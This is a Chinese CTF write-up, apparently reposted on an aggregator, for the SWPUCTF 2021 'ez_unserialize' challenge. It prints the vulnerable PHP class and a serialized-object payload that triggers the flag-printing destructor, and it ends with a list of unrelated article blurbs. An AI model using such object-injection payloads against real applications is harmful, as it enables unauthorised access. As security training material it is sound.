反序列化 [SWPUCTF 2021 新生赛]ez_unserialize

反序列化 [SWPUCTF 2021 新生赛]ez_unserialize

news/2024/11/2 18:35:43/文章来源:https://blog.csdn.net/m0_75178803/article/details/135117750

打开题目

查看源代码

得到提示，那我们用御剑扫描一下看看

我们知道有个robots.txt，访问一下得到

那我们便访问一下 cl45s.php看看

得到网站源代码

 <?phperror_reporting(0);
show_source("cl45s.php");class wllm{public $admin;public $passwd;public function __construct(){$this->admin ="user";$this->passwd = "123456";}public function __destruct(){if($this->admin === "admin" && $this->passwd === "ctf"){include("flag.php");echo $flag;}else{echo $this->admin;echo $this->passwd;echo "Just a bit more!";}}
}$p = $_GET['p'];
unserialize($p);?>

如果我们admin=admin，password=ctf，则输出flag，其中对我们get传入的p进行了反序列化操作

O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}

得到flag

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/news/235994.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

相关文章

55.0/CSS 的应用(详细版)

55.0/CSS 的应用(详细版)

目录 55.1.1 设计边框样式 55.1.2 调整边框的粗细 55.1.3 边框颜色 55.1.4 复合设置边框 55.2 模块的边距 55.3 模块的内边距 55.4 层的应用 55.4.1 层的建立 55.4.2 浮动——float 55.4.3 清除浮动 55.4.4 层的定位 55.4.5 设置层的溢出——overflow 55.4.6 设置鼠…

阅读更多...

Linux开发工具——vim篇

Linux开发工具——vim篇

vim开发工具的使用文章目录 vim开发工具的使用认识vimvim常用三种模式vim正常模式命令集模式切换移动光标删除文字赋值替换撤销上一次操作更改跳到指定的行 vim末行模式命令集列出行号跳到文件中的某一行：保存文件离开vim查找字符： 总结题外话&#xff…

阅读更多...

spring使用@Autowired @Lazy 注解解决循环依赖

spring使用@Autowired @Lazy 注解解决循环依赖

今天在启动项目时报错：org.springframework.beans.factory.UnsatisfiedDependencyException: Error creating bean with name ‘colorController’: Unsatisfied dependency expressed through field ‘projectService’; nested exception is org.springframework.…

阅读更多...

使用Dropzone提升开发效率的全方位指南

使用Dropzone提升开发效率的全方位指南

开发过程中，文件上传、图像处理、脚本执行等任务常常是不可或缺的环节。为了提升开发效率，开发者需要一个强大且灵活的工具。在这方面，Dropzone 是一个非常优秀的选择。本文将介绍如何在各种使用场景下，利用 Dropzone 工具来提高开…

阅读更多...

【数据结构和算法】子数组最大平均数 I

【数据结构和算法】子数组最大平均数 I

其他系列文章导航 Java基础合集数据结构与算法合集设计模式合集多线程合集分布式合集 ES合集文章目录其他系列文章导航文章目录前言一、题目描述二、题解 2.1 滑动窗口含义 2.2 滑动窗口一般解法 2.3 方法一：滑动窗口三、代码 3.1 方法一&#…

阅读更多...

异步编程Promise

异步编程Promise

文章目录前言一、关于 Promise 的理解与使用1.相关知识补充区别实例对象和函数对象同步回调异步回调Js中的错误（error）和错误处理 2.promise是什么二、Promise 原理三、Promise 封装 Ajax四、async 与 await总结前言在项目中，promise的使…

阅读更多...

Easyrecovery2024手机版文件数据恢复软件

Easyrecovery2024手机版文件数据恢复软件

Easyrecovery是著名数据恢复厂商Kroll Ontrack推出文件的恢复软件，因病毒、误删、U盘故障等问题导致的word/excel/ppt/照片等文件丢失的情况，Easyrecovery能做到较高的恢复成功率！Easyrecovery是全球著名数据恢复厂商Kroll Ontrack推出的文件…

阅读更多...

.Net Attribute 什么是特性、预定义特性使用（一）

.Net Attribute 什么是特性、预定义特性使用（一）

什么是特性？ 特性（Attribute）是用于在运行时传递程序中各种元素（比如类、方法、结构、枚举、组件等）的行为信息的声明性标签。您可以通过使用特性向程序添加声明性信息。一个声明性标签是通过放置在它所应用的元素前面…

阅读更多...

Git报错x509: certificate signed by unknown authority

Git报错x509: certificate signed by unknown authority

下载报错： Error downloading object: model-00001-of-00008.safetensors (ed3ac49): Smudge error: Error downloading model-00001-of-00008.safetensors (ed3ac4983f682a999b0e4b6f072aad294c4fd9a7e968e90835ba5c4b466d3c7c): LFS: Get https://cdn-lfs.huggin…

阅读更多...

【matlab】绘制横状单组渐变柱状图

【matlab】绘制横状单组渐变柱状图

% matlab绘制横状渐变柱状图 clear;clc;close all; x1:20; a[1 -1 2 -2 3 -3 4 -4 5 -5 6 -6 7 -7 8 -8 9 -9 10 -10]; close all; b0.8; figure barh(a,b,‘FaceColor’,‘none’) % 颜色包 cmap load(‘D:\matlab_work\函数名为colormore的颜色索引表制作\colormore_txt\colo…

阅读更多...

Redis-网络模型

Redis-网络模型

参考资料 ：极客时间 Redis（亚风） 前置知识系统隔离为了避免⽤户应⽤导致冲突甚⾄内核崩溃，⽤户应⽤与内核是分离的： 进程的寻址空间会划分为两部分：内核空间、⽤户空间 • ⽤户空间只能执⾏受限的命令&…

阅读更多...

Linux笔记---系统信息

Linux笔记---系统信息

🍎个人博客：个人主页 🏆个人专栏：Linux学习 ⛳️ 功不唐捐，玉汝于成目录前言命令 1. uname - 显示系统信息 2. hostname - 显示或设置系统主机名 3. top - 显示系统资源使用情况 4. df - 显示磁盘空间使用情…

阅读更多...

【2023 英特尔On技术创新大会直播 |我与英特尔的初次相遇】—— AIPC探索下一代的物联网时代

【2023 英特尔On技术创新大会直播 |我与英特尔的初次相遇】—— AIPC探索下一代的物联网时代

🌈个人主页: Aileen_0v0 🔥系列专栏:英特尔技术学习专栏 💫个人格言:"没有罗马,那就自己创造罗马~" 目录硅谷经济的发展与挑战 Intel开发者云与AI技术的应用 AI压缩技术的发展与应用英特尔与阿里巴巴在AI领域的合作 AIPC时代的…

阅读更多...

【已解决】解决Springboot项目访问本地图片等静态资源无法访问的问题

【已解决】解决Springboot项目访问本地图片等静态资源无法访问的问题

今天在开发一个招聘系统的时候，有投递简历功能，有投递就会有随之而来的查看简历对吧，我投递过的简历，另存为一个文件夹，就是说本地磁盘(或者服务器)有一个专门存放投递过的简历的文件夹，用于存放PDF&#x…

阅读更多...

重新配置torch1.8 cuda11.1 torchtext0.9.0虚拟Pytorch开发环境

重新配置torch1.8 cuda11.1 torchtext0.9.0虚拟Pytorch开发环境

这里写目录标题起因发现选择安装cuda 11.1核对下自己的显卡是否支持下载该版本的CUDACUDA下载地址CUDA安装过程在anaconda中创建一个虚拟环境1.以下是环境的配置过程2.查看虚拟环境列表3.激活虚拟环境安装torch和torchtext包的过程1.输入下面这句代码，就可以直接…

阅读更多...

韩语中的一次多用-柯桥基础韩语学习

韩语中的一次多用-柯桥基础韩语学习

1.动词，写 일기를 쓰다 写日记 2.动词，戴（帽子，眼镜，口罩） 안경을 쓰다 戴眼镜 3.动词，使用（材料，道具，手段） 세제를 쓰다 使用洗剂 4.动词&am…

阅读更多...

大创项目推荐深度学习大数据股票预测系统 - python lstm

大创项目推荐深度学习大数据股票预测系统 - python lstm

文章目录 0 前言1 课题意义1.1 股票预测主流方法 2 什么是LSTM2.1 循环神经网络2.1 LSTM诞生 2 如何用LSTM做股票预测2.1 算法构建流程2.2 部分代码 3 实现效果3.1 数据3.2 预测结果项目运行展示开发环境数据获取最后 0 前言 🔥 优质竞赛项目系列，今天…

阅读更多...

Ethernet/IP 之IO 连接简要记录

Ethernet/IP 之IO 连接简要记录

IO连接 EIP的IO连接提供了在一个生产者和多个消费者之间的特定的通信路径，以达到IO数据在IO连接下传输。生产者对象产生IO数据通过生产者IO连接管理者对象将连接ID和数据组帧发送给消费者IO连接管理者对象然后将IO数据发送给消费者对象。显示消息连接显式消息传…

阅读更多...

《信息安全工程师教材》-蒋建春、信息安全完全参考手册-Mark Rhodes Ousley、CISSP官方学习指南第九版、ISO27002学习

《信息安全工程师教材》-蒋建春、信息安全完全参考手册-Mark Rhodes Ousley、CISSP官方学习指南第九版、ISO27002学习

文章目录介绍关系学习顺序重复内容学习方法建议学习时间可能重合的部分更详细的学习计划介绍《信息安全工程师教材》- 蒋建春：这本教材可能是针对中国地区信息安全工程师的认证考试而编写的，它可能会涵盖信息安全的基本概念、技术和政策，特…

阅读更多...

【点选验证码识别】某招标网站反爬虫分析与验证码自动识别

【点选验证码识别】某招标网站反爬虫分析与验证码自动识别

文章目录 1. 写在前面2. 风控描述3. 验证码裁剪4. 验证码识别【作者主页】：吴秋霖【作者介绍】：Python领域优质创作者、阿里云博客专家、华为云享专家。长期致力于Python与爬虫领域研究与开发工作！ 【作者推荐】：对JS逆向感兴趣…

阅读更多...

推荐文章

最新文章